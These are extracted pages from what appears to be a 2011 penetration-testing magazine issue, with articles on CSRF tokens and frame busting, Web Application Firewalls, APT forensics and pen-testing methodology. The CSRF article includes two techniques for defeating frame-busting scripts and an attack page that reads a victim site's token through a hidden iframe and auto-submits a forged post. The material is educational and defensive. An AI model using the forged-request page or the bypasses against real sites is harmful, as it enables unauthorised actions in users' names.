<form name="messageForm" action="post.php" method="POST">
<input type="text" name="message">
<input type="submit" value="Post">
<input type="hidden" name="token" value="<?php echo $token; ?>">
</form>
</body>
</html>
Listing 3 Correct token
<?php
session_start();
if($_SESSION['token'] == $_POST['token']) {
    $message = $_POST['message'];
    echo "<b>Message</b><br>$message";
    $file = fopen("messages.txt", "a");
    fwrite($file, $message."\r\n");
    fclose($file);
} else {
    echo "Bad request";
}
?>
And common counter-action statements are these:
top.location = self.location
top.location.href = document.location.href
top.location.replace(self.location)
top.location.href = window.location.href
top.location.replace(document.location)
top.location.href = window.location.href
top.location.href = "URL"
document.write('')
top.location.replace(document.location)
top.location.replace('URL')
top.location.replace(window.location.href)
top.location.href = location.href
self.parent.location = document.location
parent.location.href = self.document.location
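In a real browser these conditionals compare live window objects. As a rough, hypothetical simulation, the core top != self check can be modeled with plain objects standing in for windows:

```javascript
// Toy model: a window that is NOT framed is its own top; a framed window's
// top points at the hostile parent page.
function isFramed(win) {
  return win.top !== win.self;
}

const standalone = {};
standalone.top = standalone;   // top === self: page loaded directly
standalone.self = standalone;

const framed = { top: {}, self: {} }; // top is a different (attacker) window

console.log(isFramed(standalone)); // false -> no counter-action needed
console.log(isFramed(framed));     // true  -> fire the counter-action
```

The counter-action statements above then rewrite top.location so the framed page breaks out of the attacker's iframe.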
Different FrameKillers are used by web developers, and different techniques are used to bypass them.
Method 1
<script>
window.onbeforeunload = function() {
  return "Do you want to leave this page?";
}
</script>
<iframe src="http://www.good.com"></iframe>
Method 2: Using double framing
<iframe src="second.html"></iframe>
second.html:
<iframe src="http://www.site.com"></iframe>
Best Practices
And the best example of a FrameKiller is the following:
<style> html { display: none; } </style>
<script>
if (self == top) {
  document.documentElement.style.display = 'block';
} else {
  top.location = self.location;
}
</script>
This protects the web application even if an attacker browses the webpage with JavaScript disabled in the browser.
SAMVEL GEVORGYAN
Founder & Managing Director, CYBER GATES
www.cybergates.am | samvelgevorgyan@cybergates.am
Samvel Gevorgyan is Founder and Managing Director of CYBER GATES Information Security Consulting, Testing and Research Company and has over 5 years of experience working in the IT industry. He started his career as a web designer in 2006, then began seriously learning web programming and web security concepts, which allowed him to gain more knowledge in web design, web programming techniques and information security. All this experience shaped Samvel's work ethic: he started to pay attention to each line of code, for good optimization and for protection from different kinds of malicious attacks such as XSS (Cross-Site Scripting), SQL Injection, CSRF (Cross-Site Request Forgery), etc. Thus Samvel has taken his job to a higher level and is gradually becoming a more complete security professional.
References
• Cross-Site Request Forgery – http://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF), http://projects.webappsec.org/w/page/13246919/Cross-Site-Request-Forgery
• Same Origin Policy
• FrameKiller (Frame Busting) – http://en.wikipedia.org/wiki/Framekiller, http://seclab.stanford.edu/websec/framebusting/framebust.pdf
Listing 4 Real scenario of the attack
<html>
<head>
<title>BAD.COM</title>
<script>
function submitForm() {
  var token = window.frames[0].document.forms['messageForm'].elements['token'].value;
  var myForm = document.myForm;
  myForm.token.value = token;
  myForm.submit();
}
</script>
</head>
<body onLoad="submitForm()">
<div style="display:none">
<iframe src="http://good.com/index.php"></iframe>
<form name="myForm" target="hidden" action="http://good.com/post.php" method="POST">
<input type="text" name="message" value="I like www.bad.com" />
<input type="hidden" name="token" value="" />
<input type="submit" value="Post">
</form>
</div>
</body>
</html>
WEB APPLICATION CHECKING
Page 38 httppentestmagcom012011 (1) November Page 39 httppentestmagcom012011 (1) November
Web applications are currently being used by hackers on a grand scale as gateways into corporate networks. Web Application Firewalls (WAFs) make it a lot more difficult to penetrate networks.
In most commercial and non-commercial areas, the
internet has developed into an indispensable medium that offers users a huge number of interesting and important applications. Information procurement of any kind, buying services or products, but also bank transactions and virtual official errands can be conducted easily and comfortably from the screen. Waiting times are a thing of the past, and while we used to have to search laboriously for information, we now have search engines that deliver results in a matter of seconds. And so browsers and the web today dominate the majority of daily procedures in both our private and working lives. In order to facilitate all of these processes, a broad range of applications is required that are provided more or less publicly. Their range extends from simple applications for searching for product information or forms up to complex systems for auctions, product orders, internet banking or processing quotations. They even control access to the company's own intranet.
A major reason for these rapid developments is the almost unlimited possibility to simplify and accelerate business processes and make them more productive. Most enterprises and public authorities also see the web as
an opportunity to make enormous cost savings, benefit from additional competitive advantages and open up new business opportunities. This requires a growing number of – and more powerful – applications that provide the internet user with the required functions as fast and simply as possible.
Developers of such software programs are under enormous cost and time pressure. An increasing number of companies want to use the functionality of these so-called web applications for their business processes and offer their products, services and information as quickly, simply and in as many ways as possible. So guidelines for secure programming and release processes are usually not available, or they are not heeded. In the end this results in programming errors, because major security aspects are deliberately disregarded or simply forgotten. Productive use usually follows soon after development, without developers having checked the security status of the web applications sufficiently.
Above all, the common practice of adapting tried and tested technologies for developing web applications without having subjected them to prior security and qualification tests is dangerous. In the belief that the existing network firewall would provide the required protection should weaknesses become apparent, those responsible unwittingly grant access to systems within the corporate boundaries. And thereby
First the Security Gate, then the Airplane
What needs to be heeded when checking web applications
Anyone developing a new software program will usually have an idea of the features and functions that the program should master. The subject of security is, however, often an afterthought. But with web applications the backlash comes quickly, because many are accessible to everyone worldwide.
professional software engineering was not necessarily at the top of the agenda. So web applications usually went into productive operation without any clear security standards. Their security standard was based solely on how the individual developers rated this aspect and how deep their respective knowledge was.
The problem with more recent web applications: many offerings demand the integration of additional browser plug-ins and add-ons in order to facilitate the interaction in the first place, or to make it dynamic. These include, for example, Ajax and JavaScript. While the browser was originally only a passive tool for viewing web sites, it has now evolved into an autonomous, active element and has actually become a kind of operating system for the plug-ins and add-ons. But that makes the browser and its tools vulnerable. The attackers gain access to the browser via infected web applications, and as such to further systems and to their owners' or users' sensitive data.
Some assume that an unsecured web application cannot cause any damage as long as it does not conduct any security-relevant functions or provide any sensitive data. This is completely wrong; the opposite is the case. One single unsecured web application endangers the security of the systems that follow on from it, such as application or database servers. Equally wrong is the common misconception that the telecom providers' security services would protect the data. Providers are not responsible for the safe use of web applications, regardless of where they are hosted. Suppliers and operators of web applications are the ones who carry the big responsibility here towards all those who use their applications, one which they often do not fulfill.
they disclose sensitive data and make processes vulnerable. But conventional protection systems do not guard against apparently legitimate connections that attackers build up via web applications.
As a result, critical business processes that seemed secure within the corporate perimeter are suddenly freely accessible on the web. Conventional security strategies such as network firewalls or Intrusion Prevention Systems are no longer expedient here. Particularly in association with the web, the security requirements for applications have a different focus and are much higher than for traditional network security. The requirements for service providers who conduct security checks on business-critical systems with penetration tests should be correspondingly higher as well.
While most companies now protect their networks to a relatively high standard, the hackers have long since moved on to a different playing field: they take advantage of security loopholes in web applications. There are several reasons for this. Compared with the network level, you don't need to be highly skilled to use the internet. This not only makes legitimate use easier but also encourages the malicious misuse of web applications. In addition, the internet offers many possibilities for concealment and anonymous action. As a result, the risk for attackers remains relatively low, and so does the inhibition threshold for hackers.
Many web applications that are still active today were developed at a time when awareness of application security on the internet had not yet been raised. There were hardly any threat scenarios, because the attackers' focus was directed at the internal IT structure of the companies. In the first years of web usage in particular,
Figure 1 This model (based on Everett M. Rogers' adoption curve from "Diffusion of Innovations") shows a time lag between the adoption of new technology and the securing of the new technology. Both exhibit a similar Technology Adoption Lifecycle. There is an inflection point when a technology becomes widely enough accepted, and therefore economically relevant for hackers, resulting in a period of Peak Vulnerability. Bottom line: security is an afterthought.
Web Applications Under Fire
The security issues of web applications have not escaped the attackers, and they have been exploiting these shortcomings in IT environments for some time now. There are numerous attack scenarios with which they can obtain access to corporate data and processes, or even external systems, via web applications. For years now the major types have been:
• All injection attacks (such as SQL Injection, Command Injection, LDAP Injection, Script Injection, XPath Injection)
• Cross Site Scripting (XSS)
• Hidden Field Tampering
• Parameter Tampering
• Cookie Poisoning
• Buffer Overflow
• Forceful Browsing
• Unauthorized access to web servers
• Search Engine Poisoning
• Social Engineering
The only more recent trend: attackers have started to combine these methods more often in order to achieve even higher success rates. And it is no longer just the large corporations who are targeted, because they usually guard and conceal their systems better. Instead, an increasing number of smaller companies are now in the crossfire.
One Example
Attackers know that a certain commercial software program is widely used for shopping carts in online shops, and that smaller companies rarely patch its weak points. They launch automated attacks in order to identify, with high efficiency, as many worthwhile targets as possible on the web. In this step they already gather the required data about the underlying software, the operating system or the database from web applications which give away information freely. The attackers then only have to evaluate this information. As such, they have an extensive basis for later targeted attacks.
How to Make a Web Application Secure
There are two ways of actually securing the data and processes that are connected to web applications. The first way would be to program each application absolutely error-free, under the required application conditions and security aspects, according to predefined guidelines. Companies would then also have to raise the security of older web applications to the required standards later.
However, this intention is generally doomed to failure from the outset, because the later integration of security functions into an existing application is in most cases not only difficult but above all expensive. One example: a program that has so far not processed its inputs and outputs via centralized interfaces is to be enhanced so that the data can be checked. It is then not sufficient to just add new functions; the developers must start by precisely analyzing the program and then make deep inroads into its basic structures. This is not only tedious but also harbors the danger of making mistakes. Another example is programs that use nothing more than the session attributes for authentication. In this case it is not straightforward to update the session ID after logging in, which makes the application susceptible to Session Fixation.
If existing web applications display weak spots – and the probability is relatively high – then it should be clarified whether it makes business sense to correct them. It should not be forgotten that other systems are put at risk by the unsecured application. A risk analysis can clarify whether and to what extent the problems must be resolved, or if further measures should be taken at the same time. Often, however, the original developers are no longer available, and training new developers as well as analyzing the web application results in additional costs.
The situation is not much better with web applications that are developed from scratch. No software program ever went into productive operation free of errors or without weak spots. The shortcomings are frequently uncovered only over time, and by then correcting the errors is once again time-consuming and expensive. In addition, the application cannot be deactivated during this period if it works as a sales driver or supports an important business process. Despite this, the demand for good code that sensibly combines effectiveness, functionality and security still has top priority. The more securely a web application is written, the less improvement work and the less complex the external security measures that have to be adopted.
The second approach, in addition to secure programming, is the general safeguarding of web applications with a special security system from the time they go into operation. Such security systems are called Web Application Firewalls (WAFs) and safeguard the operation of web applications.
A WAF should protect web applications against attacks via the Hypertext Transfer Protocol (HTTP). As such, it represents a special case of Application-Level Firewalls (ALF) or Application-Level Gateways (ALG). In contrast with classic firewalls and Intrusion Detection
Systems (IDS), a WAF checks the communications at the application level. Normally the web application to be protected does not have to be changed.
Secure programming and WAFs are not contradictory; they actually complement each other. Analogous to air traffic, it is without doubt important that the airplane (the application itself) is well serviced and safe. But even the perfect airplane can never replace the security gate at the airport (the Web Application Firewall), which, as the first security layer, considerably minimizes the risk of attacks on any weak spots.
After introducing a WAF it is still advisable to have its security functions checked by penetration testers. This might reveal, for example, that the system can be misused through SQL Injection by entering inverted commas. It would be a costly procedure to correct this error in the web application; if a WAF is deployed as a protective system, it can instead be configured to filter the inverted commas out of the data traffic. This simple example also shows that it is not sufficient to just position a WAF in front of the web application without an analysis: that would lead to misjudging the achieved security status. Filtering out special characters does not always prevent an attack based on the SQL Injection principle. Additionally, the system performance would suffer, as the security rules would have to be set as restrictively as possible in order to exclude all possible threats. In this context too, penetration tests make an important contribution to increasing web application security.
WAF Functionality
A major advantage of WAFs is that one single system can close the security loopholes of several web applications. If they are run in redundant mode, they can also perform load balancing functions in order to distribute data traffic better and increase the performance of the web applications. With content caching functions they reduce the load on the backend web servers, and via automated compression procedures they reduce the bandwidth requirements of the client browser.
In order to protect the web applications, WAFs filter the data flow between the browser and the web application. If an entry pattern emerges that is defined as invalid, the WAF interrupts the data transfer or reacts in another predefined way. If, for example, two parameters have been defined for a monitored entry form, the WAF can block all requests that contain three or more parameters. The length and the contents of parameters can be checked in the same way. Many attacks can be prevented, or at least made more difficult, just by specifying general rules about parameter quality, such as maximum length, valid characters and permitted value range.
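Such parameter rules can be sketched as a toy filter. The rule table and the checkRequest helper below are hypothetical illustrations, not any real WAF's API:

```javascript
// Per-parameter rules, as described above: expected parameters, maximum
// length, and the characters permitted in each value.
const rules = {
  search: { maxLen: 64, pattern: /^[\w .-]*$/ }, // letters, digits, space, . -
  page:   { maxLen: 4,  pattern: /^\d*$/ },      // digits only
};

function checkRequest(params) {
  const names = Object.keys(params);
  // Reject requests with more parameters than the form defines.
  if (names.length > Object.keys(rules).length) return false;
  return names.every(name => {
    const rule = rules[name];
    return rule !== undefined &&
           params[name].length <= rule.maxLen &&
           rule.pattern.test(params[name]);
  });
}

console.log(checkRequest({ search: 'pentest', page: '2' })); // true
console.log(checkRequest({ search: "' OR 1=1--" }));         // false: quote not allowed
```

Even this crude whitelist already blocks the classic quote-based SQL Injection probe mentioned earlier.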
Of course, an integrated XML firewall should also be standard these days, because more and more web applications are based on XML code. This protects the web server from typical XML attacks such as nested elements or WSDL Poisoning. A fully developed rule set for access rates, with finely adjustable guidelines, also eliminates the negative consequences of Denial of Service or Brute Force attacks. However, every file that is uploaded to the web application can represent a danger if it contains a virus, worm, Trojan or similar. A virus scanner integrated into the WAF checks every file before it is sent to the web application.
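The access-rate rule mentioned above boils down to counting requests per client. A deliberately simplified sketch (hypothetical makeLimiter helper, fixed window, no expiry):

```javascript
// Toy rate limiter in the spirit of the WAF "access rate" rules: allow at
// most `limit` requests per client, then start blocking.
function makeLimiter(limit) {
  const counts = new Map(); // client id -> requests seen so far
  return function allow(clientId) {
    const n = (counts.get(clientId) || 0) + 1;
    counts.set(clientId, n);
    return n <= limit;
  };
}

const allow = makeLimiter(3);
console.log([1, 2, 3, 4].map(() => allow('10.0.0.1')));
// -> [ true, true, true, false ]
```

A real WAF would add sliding windows and per-rule thresholds, but the decision per request is the same yes/no shown here.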
Figure 2 An overview of how a Web Application Firewall works
Several WAFs have the option of monitoring the data sent by the web server to the browser in such a way that they can learn its nature. In this way these filters can, to a certain extent, automatically prevent malicious code from reaching the browser if, for example, a web application does not conduct sufficient checks of the original data. Learning Mode is a profiling mode that indexes every URL and parameter in a stream of traffic in order to build a whitelist of acceptable URLs and parameters. In practice, however, a whitelist-only approach is quite cumbersome, requiring constant re-learning if there are any changes to the application. As a result, whitelist-only approaches quickly become outdated due to the constant tuning required to maintain the whitelist profiles. The contrary blacklist-only approach, on the other hand, offers attackers too many loopholes. Consequently, the ideal solution relies on a combination of whitelisting and blacklisting. This can be made easy to use with templated negative security profiles (e.g. for standard usages like Outlook Web Access, SharePoint or Oracle applications), augmented by a whitelist for high-value sub-sections like an order entry page.
To prevent a high number of false positives, some manufacturers provide an exception profiler. This flags to the administrator entries that violate the policies but can still be categorized as legitimate based on an extensive heuristic analysis. At the same time, the exception profiler suggests exemption clauses that prevent a similar false positive from being repeated.
Some WAFs provide different operating modes: Bridge Mode (as Bridge Path) or Proxy Mode (as One-Arm Proxy or Full Reverse Proxy). In Bridge Mode the WAF is used as an in-line bridge path and works with the same address for the virtual IP and the backend server. Although this configuration avoids changes to the existing network structure, and can therefore be integrated very easily and quickly to protect an endangered web application, Bridge Mode deployments sacrifice security and application acceleration for network simplicity. Additionally, this mode means that all data is passed on to the web application, including potential attacks, even if the security checks have been conducted.
The by far safer operating mode for a WAF is the Full Reverse Proxy configuration, as this is used in-line and uses both of the system's physical ports (WAN and LAN). As a proxy, a WAF can protect web applications against attacks such as Session Spoofing or Cross-Site Request Forgery, which is not possible in Bridge Mode. Some functions are only available in this mode: as a Full Reverse Proxy, a WAF provides, for example, Instant SSL, which converts HTTP pages into HTTPS without changes to the code.
Proxy WAFs also provide a whole range of further security functions. They facilitate the translation of web addresses, i.e. the rewriting of URLs used in public requests to the web application's hidden URL. This means that the application's actual web address remains cloaked. With Proxy WAFs, SSL is much faster, and the response times of the web application can also be accelerated. They also facilitate cloaking techniques, Level 7 rules (to fend off Denial of Service attacks), as well as authentication and authorization. Cloaking, the concealment of one's
Figure 3 A Web Application Firewall should also protect the outgoing traffic to make data theft more difficult
WEB APPLICATION CHECKING
Page 42 httppentestmagcom012011 (1) November Page 43 httppentestmagcom012011 (1) November
own IT infrastructure is the best way to evade the previously mentioned scan attacks which attackers use to seek out easy prey By masking outgoing data protection can be obtained against data theft and Cookie-Security prevents identity theft But the Proxy-WAFs must also be configured to correspond with the respective terms Penetration tests help with the correct configuration
Demands on Penetration Testers
When penetration testers look for weak spots, they should also take into account the Payment Card Industry Data Security Standard (PCI DSS) 2.0. This defines rules for distributing and storing Primary Account Number (PAN) information. Companies are required to develop secure web applications and maintain them constantly. Further points define formal risk checks and test processes that are intended to uncover high-risk weak spots. In order to check whether systems comply with PCI DSS, penetration testers must heed the following requirements:
• Does the system have a Web Application Firewall?
• Does the web traffic pass through a WAF proxy function?
• Are the web servers shielded against direct access by attackers?
• Is there simple SSL encryption for the data traffic, even if the application or the server does not support it?
• Are all known and unknown threats blocked?
A further point is protection against data theft. This involves checking whether the protection mechanism inspects the outgoing data traffic for the possible exfiltration of sensitive data and then stops it.
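A crude version of such an outbound check can be sketched in a few lines. The regular expression and the Luhn filter below are illustrative assumptions, not the detection logic of any particular WAF product:

```python
import re

def luhn_valid(digits: str) -> bool:
    """Luhn checksum, used to weed out random digit runs that are not card numbers."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0

# Candidate PANs: 13-16 digits, optionally separated by spaces or dashes (assumed pattern).
PAN_RE = re.compile(r"\b(?:\d[ -]?){13,16}\b")

def contains_pan(body: str) -> bool:
    """Flag a response body that appears to leak a Primary Account Number."""
    for match in PAN_RE.finditer(body):
        digits = re.sub(r"[ -]", "", match.group())
        if 13 <= len(digits) <= 16 and luhn_valid(digits):
            return True
    return False
```

A real outbound filter would also cover other sensitive patterns (e.g. national ID numbers) and would mask rather than merely detect.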
Penetration testers can fall back on web scanners to run security checks on web applications; several WAFs provide extra interfaces to automate such tests.
Since, by its very nature, a WAF stands on the front line, certain test criteria should be applied to it as well. These include, in particular, identity and access management. In this context the principle of least privilege applies: users are only granted those privileges needed for their work or for the use of the web application; all other privileges are blocked. A general integration of the WAF into Active Directory, eDirectory or other RADIUS- or LDAP-compatible authentication services makes this work easier.
The user interface is also an especially critical point, because it is the basis for safe WAF configuration. Unintelligible or poorly structured user interfaces lead to incorrect settings, which cancel out the protective functions. If, by contrast, the functions can be grasped intuitively, are clearly displayed, and are easy to understand and to set, then in practice this makes the greatest contribution to system security. A further plus is a user interface which is identical across several of the manufacturer's products, or, even better, a management center which administrators can use to manage numerous other network and security products as well as the WAF. The administrators can then rely on familiar settings processes for security clusters, which ensures that security configurations for each cluster are consistent across the organization. An extensive penetration test of web applications should therefore take the ergonomics of the WAF interface into account in the evaluation, along with the consistency of security deployment across applications and sites.
In summary, any web application, old or new, needs to be secured by a WAF in Full Proxy Mode. Penetration testers should check whether the WAF reliably cloaks system information in order to make attacks on the infrastructure less likely in the first place. They should also check whether it prevents the hacking of the application itself with common or new means, whether it secures all the backend systems the application connects to, and whether it stops leakage of sensitive data when the web application has weaknesses which the WAF cannot level out. If penetration testers are not only looking for a security snapshot but want to help their customers create sustainable security, they should always include the WAF's administration in their assessment.
OLIVER WAI
Oliver Wai leads product marketing for Barracuda's line of web application security and application delivery products. In his role, Oliver is a core member of Barracuda's security incident response team and writes frequently about the latest application security threats. Prior to Barracuda Networks, Oliver held positions at Google, Integration Appliance and Brocade Communications. Oliver has an MS in Management Science & Engineering from Stanford University and a BS (Cum Laude) in Computer Engineering from Santa Clara University.
In the upcoming issue of PenTest magazine:

• Web Session Management
• Password management in code
• ETHical Ghosts on SF1
• Preservation, namely in the online gambling industry
• Cyber Security War

Available to download on December 22nd.

If you would like to contact the PenTest team, just send an email to en@pentestmag.com. We will reply as soon as possible.
ADVANCED PERSISTENT THREATS
To do this, it is imperative to confront and correlate logs to obtain a real-time overall analysis and understand the threat mechanics:
• Mass attack on a type of application
• Attack targeting a specific application
• Attacks focused on a type of data
Reporting and Alerting
The dialogue between application, network and security teams is often complex within an organization. Formalized reports on attacks and on the use of the application provide these teams with a basis for work and an understanding of application threats.
Alerts will enable them to react and trigger procedures, either at the network level by blocking the IP of the attacker, or at the application level by forbidding access to resources or areas, or more directly by referral to a honeypot with a view to analyzing the behavior of the attacker.
Forensics
Understanding the scope of an attack
For each area compromised, it is important to understand what elements have been impacted and to trace the attack to the roots of the intrusion and compromise: the installation of a backdoor, bounce mechanisms to other areas, and/or extraction of data.
Analysis of application components
To understand how the intrusion occurred, it is important to look for abnormal uses. One example could be the presence of anomalous data in a variable or a cookie. To drill down to this level, the logs of the various application components turn out to be very useful:
• Web server or application
• Database
• Directory
• Etc.
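A first forensic pass over such logs often just searches for classic attack signatures. The rule set below is a minimal, assumed example; real investigations use far richer rules and normalized log formats:

```python
import re

# Naive signatures of anomalous input (illustrative assumptions, not a complete rule set).
SIGNATURES = {
    "sql_injection": re.compile(r"(union\s+select|or\s+1=1)", re.I),
    "path_traversal": re.compile(r"\.\./"),
    "xss": re.compile(r"<script", re.I),
}

def suspicious_entries(log_lines):
    """Return (line_number, rule_name) pairs for log lines matching a signature."""
    hits = []
    for number, line in enumerate(log_lines, start=1):
        for name, pattern in SIGNATURES.items():
            if pattern.search(line):
                hits.append((number, name))
    return hits
```

Matching lines give the investigator a starting point for reconstructing which variable or cookie carried the anomalous data.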
Systems Analysis
To understand how the attacker remained in the area, it is important to identify the type of backdoor used. From the simplest act, such as placing an executable file in the application itself, to the injection of code into a process (e.g. hooking network functions), it is necessary to analyze the system hosting the application:
• Changed configuration files
• Users added
• Security rules changed
• Errors of execution or increases in privileges
• Unknown daemons or unusual groups and users
• Etc.
Analysis of network equipment
During the various bounces within the application infrastructure, the discovery and exploration of new possibilities leaves fingerprints. Network firewalls keep precious logs with traces of these attempts. In addition, if access is logged, it is important to check whether there are connections to web applications at unusual times.
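Flagging connections at unusual times is easy to script once the access timestamps are parsed. The timestamp format and the 08:00-20:00 business window below are assumptions for illustration:

```python
from datetime import datetime

def off_hours(timestamps, start_hour=8, end_hour=20):
    """Return the timestamps that fall outside the assumed business window."""
    flagged = []
    for stamp in timestamps:
        when = datetime.strptime(stamp, "%Y-%m-%d %H:%M:%S")
        if not (start_hour <= when.hour < end_hour):
            flagged.append(stamp)
    return flagged
```

In practice the window would be tuned per application and cross-checked against maintenance schedules.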
The End Justifies the Means
In conclusion, we can see that the means used to achieve an APT are often substantial and proportional to the criticality of the targeted data. APTs are not just temporary attacks but real and constant threats with latent effect that need to be fought in the long run.
The security of an application infrastructure begins with the conception process and requires basic rules to be respected in order to simplify security operations.
Real-life experience of application management highlights the difficulties in implementing all the good practices.
A comprehensive study of threats, an appropriate response, and the anticipation of possible incidents are now the recommended procedure in dealing with application attacks.
MATTHIEU ESTRADE
Matthieu Estrade has 14 years of experience in internet security. In 2001, Matthieu designed a pioneering application firewall based on web reverse proxy technology for the company Axiliance. As a well-known specialist in his field, he soon became a member of the open source Apache HTTP Server development team. His security expertise has contributed to WASC (Web Application Security Consortium) projects like WAFEC and WASSEC. Matthieu is also a member of the French OWASP chapter. Matthieu is currently CTO at BeeWare.
WEB APP SECURITY
Dynamic web applications usually use technologies such as ASP, ASP.NET, PHP, Ajax, JSP, Perl, ColdFusion, Flash, etc.
These applications expose financial data, customer information, and other sensitive and confidential data that require authentication and authorization. Ensuring that web applications are secure is a critical mission that businesses have to undertake to achieve the desired security level of such applications. With the accessibility of such critical data to the public domain, web application security testing also becomes a paramount process for all web applications that are exposed to the outside world.
Introduction
Penetration testing (also called pen testing) is usually conducted by ethical hackers, where the security team reviews application security vulnerabilities to discover potential security risks. Such a process requires deep knowledge and experience in a variety of different tools and a range of exploits that can achieve the required tasks.
During pen testing, different web application vulnerabilities are tested (e.g. Input Validation, Buffer Overflow, Cross-Site Scripting, URL Manipulation, SQL Injection, Cookie Modification, Bypassing Authentication, and Code Execution). A typical pen test involves the following procedures:
• Identification of Ports – In this process, ports are scanned and the associated running services are identified.
• Software Services Analyzed – In this process, both automated and manual testing is conducted to discover weaknesses.
• Verification of Vulnerabilities – This process helps verify that the vulnerabilities are real, where a weakness might be exploited to help remediate the issues.
• Remediation of Vulnerabilities – In this process, the vulnerabilities are resolved and then re-tested to ensure they have been addressed.
Part of the initiative of securing web applications is to include the security development lifecycle as part of the software development lifecycle, where the number of security-related design and coding defects can be reduced, and the severity of any defects that do remain undetected can be reduced or eliminated. Despite the fact that these initiatives solve some of the security problems, some undiscovered defects will remain even in the most scrutinized web applications. Until scanners can harness true artificial intelligence, put anomalies into context, or make normative judgments about them, the struggle to find certain vulnerabilities will continue.
Web Application Security and Penetration Testing
In recent years, web applications have grown dramatically within many organizations and businesses, and such entities have become very dependent on this technology as part of their business lifecycle.
Automated Scanning vs. Manual Penetration Testing
A vulnerability assessment simply identifies and reports vulnerabilities, whereas a pen test attempts to exploit vulnerabilities to determine whether unauthorized access or other malicious activities are possible. By performing a pen test to simulate an attack, it is possible to evaluate whether an application has any potential vulnerabilities resulting from poor or improper system configuration, hardware or software flaws, or weaknesses in the perimeter defences protecting the application.
With more than 75% of attacks occurring over the HTTP/HTTPS protocols and more than 90% of web applications containing some type of security vulnerability, it is essential that organizations implement strong measures to secure their web applications. Most of these attacks occur at the front door of the organization, where the entire online community has access (i.e. port 80 and port 443). With the complexity and the tremendous amount of sensitive data existing within web applications, consumers not only expect but also demand security for this information.
That said, securing a web application goes far beyond testing the application using automated systems and tools or using manual processes. The security implementation begins in the conceptual phase, where the security risk introduced by the application is modeled and the required countermeasures are identified. It is imperative that web application security be thought of as another quality vector of every application, one that has to be considered through every step of the application lifecycle.
Discovering web application vulnerabilities can be performed through different processes:

• Automation process – where scanning tools or static analysis tools will be used
• Manual process – where penetration testing or code review will be used
Web application vulnerability types can be grouped into two categories:
Technical Vulnerabilities
Such vulnerabilities can be examined through tests such as Cross-Site Scripting, Injection Flaws, and Buffer Overflow. Automated systems and tools which analyze and test web applications are much better equipped to test for technical vulnerabilities than manual penetration tests. While automated testing and scanning tools may not be able
to address 100% of all technical vulnerabilities, there is no reason to believe that such tools will achieve this goal in the near future. Current problems facing web application tools are the following: client-side generated URLs, required JavaScript functions, application logout, transaction-based systems requiring specific user paths, automated form submission, one-time passwords, and infinite web sites with random URL-based session IDs.
Logical Vulnerabilities
Such vulnerabilities can manipulate the logic of the application to perform tasks that were never intended. While both an automated scanning tool and a skilled penetration tester can navigate through a web application, only the latter is able to understand the logic behind a specific workflow or how the application works in general. Understanding the logic and the flow of an application allows a manual pen tester to subvert the business logic and thereby expose security vulnerabilities. For instance, an application might direct the user from point A to point B to point C based on the logic flow implemented within the application, where point B represents a security validation check. A manual review of the application might show that it is possible for attackers to go directly from point A to point C, bypassing the security validation at point B.
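The A-to-C bypass above can be modeled in a few lines. The handlers below are hypothetical; they only illustrate why server-side session state, not the requested step, must decide whether validation was passed:

```python
# Hypothetical three-step workflow: A (start) -> B (security validation) -> C (final).

def vulnerable_handler(session, step):
    """Serves any requested step; never checks that B was actually passed."""
    if step == "B":
        session["validated"] = True
    return f"served {step}"

def fixed_handler(session, step):
    """Refuses step C unless the session really passed the validation step B."""
    if step == "C" and not session.get("validated"):
        return "redirect to B"
    if step == "B":
        session["validated"] = True
    return f"served {step}"
```

An automated scanner crawling links would follow A, B, C in order and see nothing wrong; only reasoning about the workflow reveals that requesting C directly skips the check.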
History has proven that software bugs, defects and logical flaws are consistently the primary cause of commonly exploited application software vulnerabilities, which can lead to unauthorized access to systems, networks and application information. It has also been proven that most security breaches occur due to vulnerabilities within the web application layer (i.e. attacks using the HTTP/HTTPS protocols). Against such attacks, traditional security mechanisms such as firewalls and IDS provide little or no protection.
Security analyses review the critical components of a web-based portal, e-commerce application, or web services platform. Part of the analysis work is to identify vulnerabilities inherent in the code of the web application itself, regardless of the technology implemented, the back-end database, or the web server used by the application.
It is imperative to point out that web application penetration assessments should be designed based upon a defined threat model. They should also be based upon the evaluation of the integration between components (e.g. third-party components and in-house built components) and the overall deployment configuration, which represents a solid choice for establishing a baseline security assessment. An application penetration assessment serves as a cost-effective mechanism that identifies the set of vulnerabilities in a given application most likely to be exploited
Figure 1: The different activities of the pen testing process
and allows similar instances of vulnerabilities to be found throughout the code.
How Web Application Pen Testing Works
Most web application penetration testing is carried out from security operations centers, where the resources under test are accessed remotely over the Internet using different penetration technologies. At the end of such a test, the application penetration test provides a comprehensive security assessment for various types of applications (e.g. commercial enterprise web applications, internally developed applications, web-based portals, and e-commerce applications). Figure 1 describes some of the activities that usually happen during the pen testing process. Testing processes used to achieve the security vulnerability assessment include Application Spidering, Authentication Testing, Session Management Testing, Data Validation Testing, Web Service Testing, Ajax Testing, Business Logic Testing, Risk Assessment, and Reporting.
In conducting web penetration testing, different approaches can be used to achieve the security vulnerability assessment; some of these approaches are:
• Zero-Knowledge Test (Black Box) – In this approach, the application security testing team will not have any inside information about the target environment, and the expected knowledge gained will be based on information that can be found in the public domain. This type of test is designed to provide the most realistic penetration test possible, since in many cases attackers start with no real knowledge of the target systems.
• Partial Knowledge Test (Gray Box) – In this approach, partial knowledge about the environment under testing will be gained before conducting the test.
• Source Code Analysis (White Box) – In this approach, the penetration test team has full information about the application and its source code. In such a test, the security team will do a line-by-line code review in an attempt to find any flaws that could allow attackers to take control of the application, perform a denial of service attack against it, or use such flaws to gain access to the internal network.
It is also important to point out that penetration testing can be achieved through two different types of testing:

• External Penetration Testing
• Internal Penetration Testing

Both types of testing can be conducted with the least information (black box) or with full information (white box).
Figure 2: The different phases of pen testing
Figure 3 shows different procedures and steps that can be used to conduct the penetration testing. The following is a description of these steps:
• Scope and Plan – In this step, the scope of the penetration test is identified and the project plan and resources are defined.
• System Scan and Probe – In this step, system scanning under the defined scope of the project is conducted: automated scanners examine the open ports, the system is scanned to detect vulnerabilities, and the hostnames and IP addresses previously collected are used.
• Creation of Attack Strategies – In this step, the testers prioritize the systems and the attack methods to be used, based on the type of each system and how critical it is. Also at this stage, the penetration testing tools are selected based on the vulnerabilities detected in the previous phase.
• Penetration Testing – In this step, the exploitation of vulnerabilities using the automated tools is conducted, where the attack methods designed in the previous phase are used to conduct the following tests: data and service pilferage, buffer overflow, privilege escalation, and denial of service (if applicable).
